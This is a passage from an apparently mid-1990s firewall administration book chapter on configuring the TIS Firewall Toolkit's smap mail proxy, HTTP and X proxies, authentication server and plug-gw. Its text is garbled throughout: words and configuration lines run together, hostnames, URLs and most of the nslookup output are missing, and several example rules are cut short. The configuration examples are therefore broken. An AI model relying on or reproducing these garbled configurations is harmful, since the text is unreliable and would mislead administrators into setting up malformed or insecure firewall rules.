The userid, directory, and timeout values are self-explanatory. However, unlike the directoryclauses for the other applications, the smap client also uses the directory to save incomingmessages. Consequently, these form the basis of your configuration:

smap: userid 6smap: directory /var/spool/smapsmap: timeout 3600

The maxbytes value specifies the size of the largest email message. If the message is larger thanthe maxbytes value, the message size is truncated. If maxbytes is not included in the configura-tion information, then the maximum message size is the size of the available space in the spoolarea. The final clause specifies the maximum number of recipients that can be attached to themail message. This is not a commonly-used option. The completed entry for the netperm-tablefile looks like this:

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smap: userid 6smap: directory /var/spool/smapsmap: timeout 3600smap: maxbytes 10000smap: maxrecip 20

If you set the value of maxbytes too small, users may not be able to receive some messagesbecause of the message’s size. This type of problem reveals itself in the log files. Lines thatresemble the following indicate the incoming mail message is too large to process:

Oct 29 12:09:52 pc smap[868]: connect host=unknown/ 29 12:09:59 pc smap[868]: exiting too much data

No other warnings of this problem occur. This is the only way the firewall operator can checkto see if large messages are the reason why mail isn’t being sent.

At this point, you have installed and configured the smap application. It is not very difficult tocomplete its setup.

Installing the smapd ApplicationUnlike smap, which is started from inetd on a connection by connection basis, smapd isstarted from the /etc/rc.local script and runs the entire time the system is running. Thedaemon startup is added to the file /etc/rc.local and then the system is rebooted. The followingshows the addition of the command to the rc.local file:

echo “Starting Firewall Mail Processor ...”/usr/local/etc/smapd

Because sendmail is not running in daemon mode, messages that cannot be delivered and arequeued must be delivered by periodically invoking sendmail to process the queue. To do this,add a line similar to the following to the crontab file:

0,30 * * * * /usr/sbin/sendmail -q > /dev/null 2>&1

This ensures that any messages that cannot be successfully delivered by the smapd applicationwill be properly handled.

Configuring the smapd ApplicationThe configuration of the smapd application is no more difficult than configuring smap. Theygenerally run without a problem. Like smap, smapd reads its configuration from the netperm-table file; it accepts no command-line arguments. The smap application reads the mail queueon a periodic basis and delivers mail to the remote system. Rules that are available to build thesmapd configuration file are listed in table 7.10.

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Table 7.10smapd Rules

Rule Description

executable pathname Specifies the pathname of the smapd executable. For historical reasons,smapd forks and execs copies of itself to handle delivering eachindividual message. THIS ENTRY IS MANDATORY.

sendmail pathname Specifies an alternate pathname for the sendmail executable. smapdassumes the use of sendmail but does not require it. An alternate maildelivery system can replace sendmail, but it should be able to acceptarguments in the form of: executable -f fromname recip1 [recip2 ...recipN]. The exit code from the mailer is used to determine the statusof delivery; for this reason, replacements for sendmail should usesimilar exit codes.

baddir pathname Specifies a directory where smapd should move any spooled mail thatcannot be delivered normally. This directory must be on the samedevice as the spool directory because the rename(2) system call isemployed. The pathname specified should not contain a trailing “/”.

userid name Specifies the userid that smapd should run under. The name can beeither a name from the password database, or a numeric userid. Thisuserid should be the same as that under which smap runs, and shouldhave write permission to the spool directory.

directory pathname Specifies the spool directory in which smapd should search for files.smapd should have write permission to this directory.

wakeup value Specifies the number of seconds smapd should sleep between scans ofthe spool directory. The default is 60 seconds.

Some options are common for smap and smapd. Nevertheless, you can build a separateconfiguration for smapd, such as the one shown here:

smapd: executable /usr/local/etc/smapdsmapd: sendmail /usr/sbin/sendmailsmapd: userid 6smapd: directory /var/spool/smapsmapd: baddir /var/spool/smap/badsmapd: wakeup 900

This configuration defines the operating parameters for smapd. The executable rule identifiesthe location of the smapd program. This rule is mandatory. The sendmail option specifieswhere the sendmail program is found. Alternate programs such as zmailer or smail can be usedin place of sendmail, as long as they conform to the exit codes used within sendmail.

The userid and directory rules specify the user under which the smapd binary executes, and thehome directory used for that configuration. The baddir value is related to directory. The value

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assigned to directory provides the name of the directory where the in transit mail messages arestored; a bad directory will be created there to save any undelivered or questionable messages.

The last value for smapd specifies how long the delay is between the processing of the queue.The default is 60 seconds; this example uses a 15 minute window.

Configuring DNS for smapFor mail to be successfully and correctly routed through the firewall, MX records need to bepublished in the zone’s DNS files to identify where SMTP mail is to be sent. This is done byadding MX, or mail exchanger, records to the DNS providers for the network domain, orzone. The zone information shown here provides some information regarding how this isconfigured.

Server: nic.fonorola.netAddress: nameserver = nameserver = preference = 10, mail exchanger = preference = 1, mail exchanger = preference = 5, mail exchanger = origin = mail addr = serial = 95102902 refresh = 10800 (3 hours) retry = 1800 (30 mins) expire = 3600000 (41 days 16 hours) minimum ttl = 86400 (1 day) nameserver = nameserver = internet address = internet address = internet address = internet address = internet address =>

This output is from the nslookup command. Despite how this looks, you are in fact lookingfor the lines that contain the description mail exchanger, which are preference = 1, mail exchanger = preference = 5, mail exchanger = preference = 10, mail exchanger =

When mail for the domain is to be sent from a host, that host will first try to locatethe domain itself. The rule determining which host will be contacted first is simple:the host that has the lowest preference value is the first to be contacted. In the sample setupyou’ve watched develop throughout this chapter, the host, which is thefirewall, will be contacted first to see if it can in fact accept the email. A recommended setup is

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to give the firewall the lowest priority on the system, so that no other machines can be directlycontacted by the outside world.

If the machine with the lowest preference value is not available, then the next system iscontacted—in this case, If the mail is delivered to, then thesendmail daemon on nis will now take responsibility for attempting to deliver it to the lowestpreference value machine, The same is true should the second mail system notbe available and the mail server must then contact the third system. The behavior describedhere may not be what happens in all situations. For example, the system couldsimply decide to attempt delivery itself and not use the next MX record. The operation ofsendmail is controlled by the file on the remote machine. Remember that whenyou make changes to your DNS, you must restart or reload the DNS so that the new informa-tion is integrated into the DNS.

Configuring the HTTP ProxyThe HTTP proxy, http-gw, does more than simply provide a mechanism for HTTP requeststo be sent through the firewall. It also provides support for Gopher clients, so that Gopher,Gopher+, and FTP requests can originate from a Gopher client, and for HTPP, Gopher,Gopher+, and FTP requests to be passed through from a WWW client.

The HTTP proxy also supports “proxy aware” clients, and supports clients that are notdesigned to work with these daemons. Before examining how to enable these services, firstexamine the steps required to place the proxy into operation, and also look at the configurationrules for this proxy.

By default, an HTTP or Gopher server usually runs on TCP/IP ports 80 and 70, respectively.These will not be running on the firewall, so it is necessary to configure inetd to acceptconnections on these ports and start the proxy agent. This is done by adding the following lineto the /etc/services file:

gopher 70/tcphttpd 80/tcp

With these lines added, inetd now knows on what ports to listen. inetd must then have theappropriate lines added to its configuration file, inetd.conf:

httpd stream tcp nowait root /usr/local/etc/http-gw http-gwgopher stream tcp nowait root /usr/local/etc/http-gw http-gw

With the inetd configuration file now updated, inetd must be restarted, or instructed to readits configuration file using the kill -1 command. When these steps are completed, the http-gwproxy is ready to configure.

http-gw reads its configuration rules and permissions information from the firewall configura-tion table netperm-table, retrieving all rules specified for “http-gw.” The “ftp-gw” rules are also

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retrieved and are evaluated when looking for host rules after all the http-gw rules have beenapplied. Table 7.11 lists configuration rules applicable to this proxy.

Table 7.11http-gw Proxy Rules

Option Description

userid user Allows the system administrator to specify a numeric userid or the nameof a password file entry. If this value is specified, http-gw will set itsuserid before providing service. Note that this option is included mostlyfor completeness; http-gw performs no local operations that are likely tointroduce a security hole.

directory pathname Specifies a directory to which http-gw will chroot prior to providingservice.

timeout secondsvalue Used as a dead-watch timer when the proxy is reading data from the net.Defaults to 60 minutes.

default-gopher server Defines a gopher server to which requests can be handed off.

default-httpd server Defines an HTTP server to which requests can be handed off if theycame from a WWW client using the HTTP protocol.

ftp-proxy server This defines an ftp-gw that should be used to access FTP servers. If notspecified, the proxy will do the FTP transaction with the FTP server.The ftp-gw rules will be used if there are no relevant http-gw rules, sothis is not a major problem.

The userid, directory, and timeout values serve the same functions as the other proxy agents inthe Toolkit. However, you need to examine the rules that the default-httpd server, default-gopher server, and default-ftp server play. To understand their impact, you need to examinehow a non-proxy aware and a proxy aware WWW client operate.

Non-Proxy Aware HTTP ClientsA non-proxy aware HTTP client, such as the Internet Explorer Version 1.0 from Microsoft,cannot communicate with a proxy. The user must configure the client to connect first to thefirewall, and then to go to the desired site. To do this, the user must specify the URL in theformat:


as in

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The client will pass the request for to the firewall. The firewall thenestablishes the connections required to bring the requested information to the client.

Although a proxy-aware client can still use this format, this is the only format that can be usedwith non-proxy HTTP clients. World Wide Web clients are also capable of accessing FTP andGopher services. Table 7.12 lists the URL formats used for each of these services.

Table 7.12Supported URL Formats

Service URL

HTTP http://firewall_name/http://www_server

Gopher http://firewall_name/gopher://gopher_server

FTP http://firewall_name/ftp://FTP_server

Internet users who work with non-proxy aware clients need to make changes to their WWWclient if a firewall is installed after the users have developed and built their hotlists. In thesesituations, their WWW client hotlists will have to be edited to include the firewall in the URL.

Using a Proxy Aware HTTP ClientA proxy aware HTTP client such as Netscape Navigator or NCSA Mosaic does not have theseproblems. However, some application-specific configuration is required to make it work.Although nothing additional must be done on the HTTP proxy side, the client must beconfigured with the appropriate proxy information.

Aside from this application-specific customization, there are no other difficulties in using theproxy aware client. When these WWW clients have been configured, they are much easier forthe end user to handle because there is less confusion in accessing sites.

All World Wide Web clients can access Gopher (and FTP) sites. As you have seen, if the clientis aware of the proxy, access to these different types of Internet sites is much simpler to set up.Accessing a gopher server with a World Wide Web browser is much easier than with manyGopher clients, if the World Wide Web browser is proxy-aware. Connecting to the gopherserver is as simple as specifying a URL:


This syntax allows the connection to the external gopher server through the firewall.

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Host Access RulesUp to this point in the chapter, you have seen how the user interacts with the proxy. Nowexamine how you can alter the operation of the proxy by applying some host access rules.Some of these rules have been examined already, and are important enough to mention again.The host access rules may include optional parameters to further control the session. Some ofthese parameters include restricting the allowable functions. The rules and their parameters areincluded in table 7.13.

Table 7.13Host Access Rules

Option Descriptions

Hosts host-pattern [host-pattern ...] [options] Rules specify host and access permissions.Permit-hosts host-pattern [host-pattern ...] Typically, a host rule will be in the form of: options] http-gw: deny-hosts unknownDeny-hosts host-pattern [host-pattern ...] http-gw: hosts 192.33.112.* 192.94.214.*

-permit function Only the specified functions are-permit { function [function ...] } permitted. Other functions will be

denied. If this option is not specified,then all functions are initially permitted.

-deny function Specifies a list of Gopher/HTTP-deny { function [function ...] } functions to deny.

-gopher server Make server the default server forthis transaction.

-httpd server Makes server the default HTTP serverfor this transaction. This will be usedif the request came in through theHTTP protocol.

-filter function Removes the specified functions when-filter { function [function ...] } rewriting selectors and URLs. This

rule does not stop the user fromentering selectors that the client willexecute locally but this rule can beused to remove them from retrieveddocuments.

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Several host patterns may follow the “hosts” keyword; the first optional parameter after thesepatterns begins with “-”. Optional parameters permit the selective enabling or disabling oflogging information.

Some basic configuration rules are shown here to help you understand how the options forhost rules are used:

http-gw: userid www# http-gw: directory /usr/local/secure/wwwhttp-gw: timeout 1800http-gw: default-httpd www.fonorola.nethttp-gw: default-gopher gopher.fonorola.nethttp-gw: permit-hosts 206.116.65.*

The permit-hosts line establishes what hosts or networks are allowed to pass through thefirewall using the proxy. To deny access to specific hosts or networks, use a line similar to:

http-gw: deny-hosts

When this type of setup is in operation, a user who is trying to use the proxy from thismachine receives a Sorry, access denied error message.

The permit-host rules can include function definitions that are permitted or denied dependingon the established criteria in the rule. The proxy characterizes each transaction as one of anumber of functions. For the deny options the request is used; for filter options the returnedselectors are used. These functions are listed in table 7.14.

Table 7.14Function Definitions

Function Description

dir Fetching Gopher menus. Getting a directory listing via FTP. Fetching anHTML document.

read Fetching a file of any type. HTML files are treated as read even though theyare also dir.

write Putting a file of any type. Needs Gopher+ since only available to Gopher+and HTTP/1.x.

ftp Accessing an FTP server.

plus Gopher+ operations. HTTP methods other than GET.

wais WAIS index operations.

exec Operations that require a program to be run; that is, telnet.

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Function controls enable the firewall administrator to specifically set up what will and will notbe allowed to pass through the proxy. If no deny or permit functions are specified, everyfunction is permitted. Consider, for example, a setup that would not allow file transfers usingthe -deny ftp command:

http-gw: userid www# http-gw: directory /usr/local/secure/wwwhttp-gw: timeout 1800http-gw: default-httpd www.fonorola.nethttp-gw: default-gopher gopher.fonorola.nethttp-gw: permit-hosts 206.116.65.* -deny ftp# http-gw: deny-hosts deny-hosts unknown

By using this deny request to restrict the use of the ftp command, users can no longer requestan FTP session through the http-gw proxy. A sample error message would look like:

use file fig11.pcx

In this configuration, any attempt to establish an FTP session using either the following syntaxor a WWW page will result in failure:

Note If you are concerned about FTP transfers, and you have disabled the ftp-gw proxy toprevent FTP transfers, you need to carefully consider the value of disabling the ftpcommands in the HTTP protocol set. Closing one door but leaving a related oneopen is not wise.

Few of the current Gopher clients are capable of interacting as well as proxy-aware WWWclients. To use a Gopher client, you must configure the default gopher server that is used toestablish the connection to the firewall. From here you will have to configure jumping offpoints to different gophers.

Because of the looming difficulty associated with Gopher clients, the use of Gopher via theWorld Wide Web interface is popular and widely accepted. Clearly, this capability indicatesthat there is more flexibility within the HTTP architecture.

Configuring the X Windows ProxyThe x-gw X Windows proxy is provided to allow a user-level X Windows interface thatoperates under the tn-gw and rlogin-gw access control. Recall from the earlier discussion of thetn-gw command that this command enables an X session through the gateway.

The proxy operates by allowing clients to be started on arbitrary hosts outside the firewall, andthen requesting a connection to the specified display. When the X connection request by the

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client is made, the x-gw proxy displays a window that is running on a virtual display on thefirewall. Upon receiving the connection request, x-gw displays the window on the user’s realdisplay. This display prompts for confirmation before proceeding with the connection. If theuser agrees to accept the connection, x-gw passes the data from the virtual display to the user’sreal display.

The x-gw proxy can be started from a telnet or rlogin sequence, as shown by this output:

% telnet pcTrying to character is ‘^]’ telnet proxy (Version V1.3) ready:tn-gw-> xtn-gw-> exitDisconnecting...Connection closed by foreign host.

At this point a window pops up on the user’s display that shows the port number of the proxyto use; the window also serves as the control window. Choosing the Exit button will close allmultiple X connections.

Although the x-gw proxy is advanced and user-friendly, some issues concerning this proxy needto be mentioned. The major issue is that this proxy relies on the X11 Athena Widget set. Ifyour system does not have the X11 libraries or the Athena Widget set, this proxy will notcompile, and you will be forced to live without it. Fortunately, very few people allow the use ofX windows applications through their firewall.

Understanding the Authentication ServerThe TIS Firewall Toolkit includes extensive authentication mechanisms. The TIS authentica-tion server consists of two components: the actual server itself, and a user authenticationmanager, which is used to interact with and configure the server.

The authentication server, known as authsrv, is designed to support multiple authenticationprocesses independently. This server maintains an internal user database that contains a recordfor each user. The information stored for each user consists of:

■ The user’s name

■ The user’s group

■ The user’s long name

■ The last successful authentication

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Passwords may be plaintext for local users, or encrypted for all others. The only time plaintextpasswords would be used is when the administrator wants to control access to firewall servicesby users on the protected network.

Plaintext passwords should never be used for authentication by users on non-secure networks.

Users in the authsrv database can belong to different groups; a group administrator can benamed who can only manage the users in that group. authsrv also contains support formultiple forms of authentication, including:

■ Internal plaintext passwords

■ Bellcore’s S/Key

■ Security Dynamics SecurID

■ Enigma Logics Silver Card

■ Digital Pathways SNK004 Secure Net Key

Note The Bellcore S/Key mechanism that is included with the Toolkit does not include thecomplete software. The entire S/Key distribution can be downloaded via FTP

When compiling authsrv, the administrator needs to decide which authentication forms will besupported locally. It is typical to find multiple forms in use by a single company depending oncost and availability. For each proxy in the Toolkit, authentication can be enabled or disabled,or fit certain criteria, such as incoming must authenticate, and outgoing requires no authenti-cation.

Authsrv should be run on as secure a host as possible, which is generally the firewall itself. Toconfigure the authentication server, you must find an unused TCP/IP port number and add itto /etc/services. For example, if you use port 7777 as the TCP port, the following line wouldbe added to the /etc/services file.

authsrv 7777/tcp # TIS Toolkit Authentication

Authsrv is not a daemon. It runs whenever a connection request is made on the specified TCPport. Consequently, it is necessary to add an entry to the /etc/inetd.conf file, such as thisexample:

authsrv stream tcp nowait root /usr/local/etc/authsrv authsrv

After the required entries are placed in the /etc/services and /etc/inetd.conf files, inetd mustbe reloaded or restarted using the kill command. At this point, individual clients must be


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configured to use the authentication server when required. Keep in mind that not all opera-tions need to require authentication.

To configure a given proxy, you must use the port number and the authserver keywordspecifying the host to connect to for the authentication server. To see this in action, consideradding authentication to the FTP proxy. For the FTP proxy to be able to use the authentica-tion server, you must tell it to use authserver rule:

# Use the following lines to use the authentication serverftp-gw: authserver localhost 7777

When the FTP proxy is activated, requests must be. authenticated. The permit-hosts entry,however, has the flexibility to take advantage of the authentication system. For example,consider the permit-hosts entry in the following:

ftp-gw: permit-hosts 206.116.65.* -log { retr stor } -auth { stor }

The permit-hosts entry says that all retrieve and store file requests to the FTP proxy are logged,and all store file requests are blocked until the user has authenticated. This process will bedemonstrated later in this chapter after you learn how to configure the users in the authentica-tion database.

The Authentication DatabaseThe authentication server must also be configured to accept connections from specific clients.This prevents unwanted attempts to probe the authentication server from hosts runningsoftware that needs no authentication. The authentication server reads its rules from thenetperm-table, which can include rules listed in table 7.15.

Table 7.15Authentication Server Rules

Rule Description

database pathname Specifies the pathname of the authsrv database. The databaseis stored as a dbm(3) file with a third file used for locking. Ifthe software is built with a compiled-in database name, thisoption need not be set; otherwise, it is mandatory.

nobogus true Indicates that authsrv should return “user-friendly” errormessages when users attempt to authenticate and fail. Thedefault message is to simply respond, “Permission Denied.”or to return a bogus challenge. If nobogus is set, attempts tolog on will return more explicit error messages. Sites that areconcerned about attempts to probe the authentication servershould leave this option disabled.

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badsleep seconds Establishes a “sleep time” for repeated bad logins. If a userattempts to authenticate five times and fails, his user recordis marked as suspicious, and he cannot log on again. If thebadsleep value is set, the user may attempt to log in againafter the set number of seconds has expired. If the badsleepvalue is 0, users can attempt to log in as many times as theywould like. The default value is to effectively disable theaccount until an administrator re-enables it manually.

userid name Specifies the userid under which authsrv should run. Thename can be either a name from the password database, or anumeric user-ID.

hosts host-pattern [key] Specifies that authsrv should permit the named host oraddresses to use the service. Hosts that do not have amatching entry are denied use of the service. If the optionalkey is specified, and the software is compiled with DES-encrypted communications, all traffic with that client will beencrypted and decrypted with the specified key.

operation user id telnet-gw host Operation rules are stored in netperm-table. For eachoperation user id ftp-gw host put user/group the name is specified followed by the service

destination [optional tokens] [time start end]. The user/group field indicates whether the record is for a user or agroup. The name is either the username or the groupname. The service can be a service specified by the proxy(usually ftp-gw, tn-gw, or rlogin-gw). The destination canbe any valid domain name. The optional tokens are checkedfor a match, permitting a proxy to send a specific operationcheck to the authentication server. The time field is optionaland must be specified time start_time end_time; start_timeand end_time can be in the range 00:00 to 23:59.

If no other systems on the private network require access to the authsrv, then clients and theserver should be configured to accept connections only using the localhost name or IP address127.0.0.1. The authentication server configuration rules shown earlier illustrate a sampleconfiguration for the server.

The example shown here establishes the following rules for the authentication server:

authsrv: hosts database /usr/local/etc/fw-authdb

Rule Description

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authsrv: badsleep 1200authsrv: nobogus true

■ Identifies that the localhost is allowed to access the server

■ Specifies that the authentication database is found in /usr/local/etc/fw-authdb

■ The user cannot attempt to authenticate after five bad logins until 1,200 seconds haveexpired

■ Prints more verbose messages about authentication failures

The operation rule is essential to administrators who want to restrict the commands that canbe executed by certain users at certain times. This is done by adding configuration rulesconsisting of the user, the operation, and the time restrictions to the netperm-table. Theserules apply to the authsrv command and not to the individual proxies themselves. Consider theexample shown here:

authsrv permit-operation user chrish telnet-gw time 08:00 17:00authsrv deny-operation user paulp telnet-gw time➥17:01 07:59authsrv permit-operation group admin telnet-gw * time 08:00 17:00

You can see that through careful consideration, the availability of various services can be tightlycontrolled depending on the environment and the organization’s security policy. With theauthentication server configured and ready, users must now be added so that they can beauthenticated whenever necessary.

Adding UsersBefore a user can be authenticated by the server, the user must be added to the database. Thiscan be done by using the authsrv command. When invoking authsrv on the firewall with auserid of zero, authsrv grants administrative privileges for the database.

The authentication server has a number of commands, listed in table 7.16, for user administra-tion.

Table 7.16Administrator Commands for Authentication Setup

Command Description

adduser username [longname] Adds a user to the authentication database. Before theauthentication server permits the use of this command, theadministrator must first be authenticated to the server as anadministrator or a group administrator. If the user is a groupadministrator, the newly created user is automaticallyinitialized as a member of that group. When a user is added,the user is initially disabled. If a long name is provided, it will

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be stored in the database. Long names should be quoted ifthey contain whitespace.

deluser username Deletes the specified user from the authentication database.Before an administrator can use this command, he or shemust first be authenticated to the server as the administratoror group administrator of the group to which the userbelongs.

display username Displays the status, authentication protocol, and last login ofthe specified user. Before the authentication server permitsthe use of this command, the administrator must first beauthenticated to the server as the administrator or as thegroup administrator of the group to which the user belongs.

enable username Enables or disabled the specified user’s account for login.or disable username Before this command can be used, the administrator must

first be authenticated to the server as the administrator orgroup administrator of the group to which the userbelongs.

group user groupname Sets the specified user’s group. To use this command, theadministrator must first be authenticated to the server as theadministrator. Group administrators do not have the powerto “adopt” members.

list [group] Lists all users that are known to the system, or the membersof the specified group. Group administrators may list theirown groups, but not the entire database. The list displaysseveral fields, including:

■ user. The login ID of the user.■ group. The group membership of the user. If none is

listed, the user is in no group.■ longname. The user’s full name. This may be left blank.■ status. Contains codes indicating the user’s status.

password [username] text Sets the password for the current user. If an optionalusername is given and the authenticated user is the adminis-trator or group administrator, the password for the specifieduser is changed. The password command is polymorphicdepending on the user’s specified authentication protocol. Forexample, if the user’s authentication protocol is plaintextpasswords, it will update the plaintext password. If theauthentication protocol is SecurID with PINs, it will updatethe PIN.

Command Description


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proto user protoname Sets the authentication protocol for the specified user to thenamed protocol. Available protocols depend on the compiled-in support within authsrv. To change a user’s authenticationprotocol, the administrator must be authenticated to theserver either as the administrator or group administrator ofthe user’s group.

quit or exit Disconnects from the authentication server.

superwiz user Sets the specified user as a global administrator. Thiscommand should only be used with deliberation; globaladministrative privileges are seldom used because the groupmechanism is powerful enough.

wiz user Sets or turns off the group administrator flag on theor unwiz user specified user. To issue this command, the administrator

must be authenticated to the server as the administrator.

? or help Lists a short synopsis of available commands.

To illustrate the use of these administrator commands, suppose you want to add a new user tothe database. To do this, make sure you are logged in as root on the firewall, and run theauthsrv command:

pc# pwd/usr/local/etcpc# ./authsrvauthsrv#

At this point, you can run any command shown in table 7.16. To add a user, use both theusername and the long name with the command:

authsrv# adduser chrish “Chris Hare”ok - user added initially disabledauthsrv#

Notice that the user, although added, is initially disabled. No password is associated with theuser. At this point, you need to set a password for the user, and specify the group to which theuser belongs.

authsrv# password chrish whisperPassword for chrish changed.authsrv# group chrish productionset groupauthsrv#

Table 7.16, ContinuedAdministrator Commands for Authentication Setup

Command Description

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Now that the password and group membership are changed, identify the authenticationprotocol that will be used for this user. Available protocols depend on the protocols that werecompiled when authsrv was built.

authsrv# proto chrish plaintextUnknown protocol “plaintext”, use one of: none passwordauthsrv# proto chrish passwordchangedauthsrv# enable chrishenabledauthsrv#

If an unknown protocol is used when you set the protocol type, authsrv lists the availableauthentication protocols. In this instance, the only options available are none and password.After the authentication protocol is set, the user chris is enabled. At this point, the user chriscan authenticate him- or herself using the authentication server.

Before you give the user free rein, however, establish for this user the wizard for group admin-istrator privileges, and superwiz, which grants global administrator privileges. Normally thiswouldn’t be done because global administrative privileges supersede the privileges of the groupadministrator.

authsrv# wiz chrishset group-wizardauthsrv# superwiz chrishset wizard

With these additional privileges set, you can list the information from the authsrv databaseusing the list command.

authsrv# listReport for users in databaseuser group longname status proto last---- ----- -------- ------ ----- ----chrish production Chris Hare y G passw neverauthsrv#

This output shows the username, the group that the user belongs to, the long name, the statusflags, authentication protocol, and when the user last authenticated. The status field includesthe following information:

Letter Description

b Account locked due to too many failed logins

n Account disabled

y Account enabled

G Group Wizard flag set

W Global Wizard flag set

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The list command displays information for all the users; the display command shows moreinformation for a given user.

authsrv# display chrishReport for user chrish, group production (Chris Hare)Authentication protocol: passwordFlags: WIZARD GROUP-WIZARDauthsrv#

As you can see, this command provides information similar to the list command, but includesa text explanation of the flags set for this user.

As many users as needed can be added in this manner, although you can see that this is atedious job for even a small organization.

The Authentication Shell—authmgrThe authsrv command enables a local user access to the firewall host to manipulate thedatabase; the authmgr program also allows users to manipulate the database such access, butfrom a trusted host on the network or through the local host. Unlike the authsrv command,the authmgr program requires that the user log in to authenticate him- or herself to thedatabase. If the user is not enabled or in the database, the connection is refused. Here is a shortauthmgr session.

pc# ./authmgrConnected to serverauthmgr-> loginUsername: adminPassword:Logged inauthmgr-> listReport for users in databaseuser group longname status proto last---- ----- -------- ------ ----- ----paulp copy n G passw neverchrish production Chris Hare y W passw neveradmin manager Auth DBA y W passw Fri Oct 27 23:47:04 1995authmgr-> quitpc#

All the commands and functionality that are part of the authsrv command are also part ofauthmgr. This may be apparent, but keep in mind that the authmgr command actuallyestablished a TCP session to the authsrv program.

Database ManagementTwo more commands are available for manipulating the authentication database: authload andauthdump. The authload command manipulates individual records in the database; it does not

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truncate an existing database. It is useful when you need to add a bunch of new entries to thedatabase, or when you need to share databases between sites. If you have users who sharesimilar information between sites, the existing records will be overwritten with newer informa-tion when this information is loaded by the authload command.

The authdump command creates an ASCII backup copy of the information in the database.This ASCII copy contains all the information regarding the user account. The passwordshowever, are encrypted, so that they cannot be read and used to circumvent the securityprovided by the Toolkit.

The authdump command reads the contents of the authentication database and writes theASCII text. A sample execution of the command is here:

pc# ./authdump

user=chrishlongname=Chris Haregroup=productionpass=cY8IDuONJDQRAflags=2bad_count=0proto=plast=0

user=adminlongname=Auth DBAgroup=managerpass=tx6mxx/lUy2Mwflags=2

If the command is executed and the output is redirected to a file, the program prints a dot foreach record dumped, along with a report of the total records processed:

pc# ./authdump > /tmp/auth...3 records dumpedpc#

If you have this information stored somewhere else in a human-readable form (except for thepasswords), you can re-create the user database if the firewall ever needs to be rebuilt.

The authload program can take the output of the authdump program and reload the database.The authload command is valuable if the user database was destroyed, or you have a largenumber of users to add at once. In this manner, new records can be added to the ASCII fileand only the new records will be loaded into the authentication database. Consider the newentry added to this ASCII dump file:

user=terrihlongname=Terri Haregroup=production

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Now you can load the records into the database, using input redirection because the informa-tion is in the ASCII dump file:

pc# ./authload < /tmp/auth....4 records loadedpc#

This results in a report showing the number of records that have been loaded. You can thenverify the status of the additional records using the authmgr “list” command:

pc# ./authmgrConnected to serverauthmgr-> loginUsername: adminPassword:Logged inauthmgr-> listReport for users in databaseuser group longname status proto last---- ----- -------- ------ ----- ----paulp copy n G passw neverterrih production Terri Hare y passw neverchrish production Chris Hare y W passw neveradmin manager Auth DBA y W passw Sat Oct 28 01:45:32 1995authmgr->

At this point, it is important to note that the new account terrih is enabled, but there is nopassword. A password should be assigned as quickly as possible to prevent fraudulent use of thefirewall, and potential loss of security of the network.

As an added measure of safety, it is advised to add a line to root’s crontab to make “backups”of the authentication database. The following shows a sample entry:

0 1 * * * /usr/local/etc/authdump > /usr/local/etc/auth.backup

The cron command will run the authdump command at 1:00 AM, every morning. Thisensures a reliable backup of your database in ASCII format. If the information on your serverdoes not change very often, you probably should adjust the timing of the cron execution ofauthdump.

Authentication at WorkYou might now be interested in seeing how the authentication server operates. Each of theproxies has the option of being configured to operate with the authentication server. The

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example shown here focuses on the FTP proxy. The FTP proxy’s configuration can be foundin the section “Configuring the FTP Gateway.”

ftp-gw: denial-msg /usr/local/etc/ftp-deny.txtftp-gw: welcome-msg /usr/local/etc/ftp-welcome.txtftp-gw: help-msg /usr/local/etc/ftp-help.txtftp-gw: authserver localhost 7777ftp-gw: timeout 3600ftp-gw: permit-hosts 206.116.65.* -log { retr stor } -auth { stor }

Recall from earlier discussions that the last line of this configuration is actually what causes theauthentication to be performed. In fact, it is fairly specific in that any request to retrieve a filefrom the remote, or to store a file on the remote results in that operation being logged by theproxy. In addition, the store command to save a file on the remote system is not permitteduntil the user authenticates him- or herself to the proxy. This process is illustrated here:

pc# ftp pcConnected to to the URG Firewall FTP Proxy220-220-To report problems, please contact Network Security Services at 555-1212 or220-by e-mail at [emailprotected] ( [emailprotected](----GATEWAY CONNECTED TO FTP server (Version A) ready.)331 Password required for chrish.Password:230 User chrish logged in.Remote system type is Unix.Using binary mode to transfer files.ftp> put /tmp/tracelocal: /tmp/trace remote: /tmp/trace200 PORT command successful.500 command requires user authenticationftp> quote authorize chrish331 Enter authentication password for chrishftp> quote response whisper230 User authenticated to proxyftp> put /tmp/tracelocal: /tmp/trace remote: /tmp/trace200 PORT command successful.150 Opening BINARY mode data connection for /tmp/trace.226 Transfer complete.2181 bytes sent in 0.0061 seconds (3.5e+02 Kbytes/s)ftp> quit221 Goodbye.

For FTP clients that do not know which proxy is used for authentication, the ftp quotecommand must be used to “speak” with the authentication server on the firewall. During thisprocess, the password that is submitted by the user is echoed on-screen, and is therefore visibleto anyone in the immediate vicinity.

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This is just one example of authentication use with proxies; countless more examples could beused. Hopefully, the information and examples you have seen so far on proxies and theauthentication server should help you design a secure firewall.

Using plug-gw for Other ServicesThe applications you have read about so far cover about 80 percent of the network traffic.What about TIS Toolkit support for the Network News Transport Protocol (NNTP) or eventhe Post Office Protocol (POP)? Both of these services, and many others, are available throughthe plug-gw application. This application provides plugboard type connections; that is, itconnects a TCP/IP port on the firewall to another host using the same or a different TCP portnumber. This functionality makes it easy to provide other services through the firewall. Thenext few sections examine the operation and configuration of plug-gw by looking specifically attheir services.

Configuring plug-gwplug-gw reads the configuration lines that start with plug-gw: from the netperm-table file—just like the other Toolkit applications. The clauses listed in table 7.17 are used with the plug-gw application.

Table 7.17plug-gw Rules and Clauses

Rule Description

timeout seconds Specifies a timeout value, after which inactive connec-tions are disconnected. If no timeout is specified, thedefault is to remain connected until one side or the othercloses its connection.

port portid hostpattern [options] Specifies a connection rule. When a connection is made,a match is searched for on the port-id and calling host.The port-id may be either a numeric value (such as 119)or a value from /etc/services (such as “nntp”). If thecalling port matches, then the host-pattern is checked fora match following the standard address matching rulesemployed by the firewall. If the rule matches, theconnection will be made based on the remaining optionsin the rule, all of which begin with “-”.

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-plug-to host Specifies the name or address of the host to connect to.This option is mandatory.

-privport Indicates that a reserved port number should be usedwhen connecting. Reserved port numbers must bespecified for protocols, such as rlogin, which rely on themfor “security.”

-port portid Specifies a different port. The default port is the same asthe port used by the incoming connection.

The purpose of plug-gw is to allow for other services to be passed through the firewall withadditional logging to track the use of these services. The availability of this service means thatadditional service specific applications do not need to be created unless required. Someapplications do not have extended authentication mechanisms in them; plug-gw makes theiruse with firewalls much less of a bother.

The rules available for plug-gw, when used on a POP connection, look like this:

plug-gw: port 110 206.116.65.* -plug-to

This line indicates that any connection received on port 110 (Post Office Protocol) from the206.116.65 network is to be connected to Additional options for the rule allowfor the specification of a priveleged port number. Few services actually require these. The finaloption allows for the specification of an alternate port number should the same service berunning on a different port number at the remote end.

